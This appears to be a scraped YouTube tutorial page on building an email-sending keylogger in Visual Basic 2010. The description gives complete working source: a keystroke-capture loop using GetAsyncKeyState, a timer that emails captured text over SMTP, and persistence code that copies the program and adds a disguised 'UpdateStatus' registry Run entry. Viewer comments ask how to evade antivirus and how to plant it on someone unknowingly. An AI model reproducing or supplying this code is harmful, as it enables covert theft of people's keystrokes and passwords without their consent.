How to make an Email Sending Keylogger In Visual Basic 2010

Loading...

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
26,734
Loading...
Alert icon
Sign in or sign up now!
Alert icon

Uploaded by on Dec 23, 2010

If you have any comments/questions post below
(update)
Here is a working code to make the keylogger startup with windows:
Dim appname As String = IO.Path.GetFileName(Application.ExecutablePath) My.Computer.FileSystem.CopyFile(Application.ExecutablePath, "C:\ProgramData\status\" & "Status.EXE", True) Dim regKey As Microsoft.Win32.RegistryKey regKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", True) regKey.SetValue("UpdateStatus", Chr(34) + "C:\ProgramData\status\" + "Status.EXE" + Chr(34)) regKey.Close()

You can change status or Status to whatever you want as long as it does NOT have spaces and you make sure if you change one status or Status that you change the other to the exact same thing or this will NOT work.
(update)
Heres the codes in a txt file because YouTube messes them up: http://www.mediafire.com/?c0wo5co055zy0sc

Code:

Imports System.Net.Mail

Public Class Form1 Dim result As Integer Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Int32) As Int16 Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick For i = 1 To 255 result = 0 result = GetAsyncKeyState(i) If result = -32767 Then RichTextBox1.Text = RichTextBox1.Text + Chr(i) End If Next i End Sub Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("your email") MyMailMessage.To.Add("your email") MyMailMessage.Subject = ("Keylogger") MyMailMessage.Body = RichTextBox1.Text Dim SMTPServer As New SmtpClient("your smtp host") SMTPServer.Port = 587 SMTPServer.Credentials = New System.Net.NetworkCredential("your username", "your pw") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage) RichTextBox1.Text = ("") End Sub
End Class

Category:

Howto & Style

Tags:

License:

Standard YouTube License

  • likes, 11 dislikes

Link to this comment:

Share to:

Top Comments

see all

All Comments (173)

Sign In or Sign Up now to post a comment!
  • @OperatorJaell Take a Look: watch?v=2IBRq9Di4wo&nomobile=1­

  • can u make me one cuz this is too hard for me

  • is there a way make it undetectable so virus scanner cant find it

  • cant find getasynckeystate in DLL user32.":""}

  • i have the same problem what can we do??

  • Unable to load DLL 'user64': The specified module could not be found. (Exception from HRESULT: 0x8007007E)

  • can you help me whenever i type it only says i typed like the o in notepad and it sends me emails of this  not letters just 

  • why am i getting 1million blue squiggly line errors this is FUCKING PISSING ME OFF

  • @latoonia Get nerdy antivirus.

  • With this tutorial can I send it to someone else? without letting the person know?

    Thanks!

Loading...

Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more